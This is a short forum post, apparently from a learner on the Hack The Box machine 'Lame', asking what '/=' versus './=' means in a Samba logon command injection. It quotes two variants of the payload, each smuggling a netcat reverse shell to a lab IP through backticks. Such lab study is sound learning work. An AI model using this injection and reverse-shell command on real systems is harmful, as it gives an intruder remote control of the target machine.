Hello all,
I am going through the box Lame. After reading some of the walkthroughs I have one confusion.
logon “/= nohup nc -nv 10.10.14.6 4444 -e /bin/sh
”
logon “./= nohup nc -nv 10.10.14.6 4444 -e /bin/sh
”
I understood the concept of backtick. the command I will put under the backtick that will execute first But I did not understand what does /= or ./= mean. Some people used /= and some people used ./=. What is the difference between these two?
Kind Regards